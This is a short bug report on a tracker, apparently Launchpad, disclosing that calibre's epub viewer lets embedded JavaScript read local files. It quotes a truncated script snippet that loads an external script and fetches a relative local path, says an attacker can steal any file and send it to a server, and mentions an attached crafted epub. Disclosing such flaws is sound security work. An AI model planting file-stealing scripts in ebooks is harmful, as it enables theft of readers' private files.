Local file access trought javascript in epub View
Bug #1651728 reported by
Jędrzej
This bug affects 1 person
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
calibre |
Fix Released
|
Undecided
|
Unassigned |
Bug Description
Hello,
Calibre can access the local files using javascript in epub file.
Code snippet:
<script src="https:/
<script>
$.getScript( "../../
});
</script>
Attacker can steal any victim file and send to server.
Tested on: Mac, i think it will work on any OS
Version: 2.74.0
information type: | Private Security → Public Security |
To post a comment you must log in.
Crafted epub file.
Payload on page 3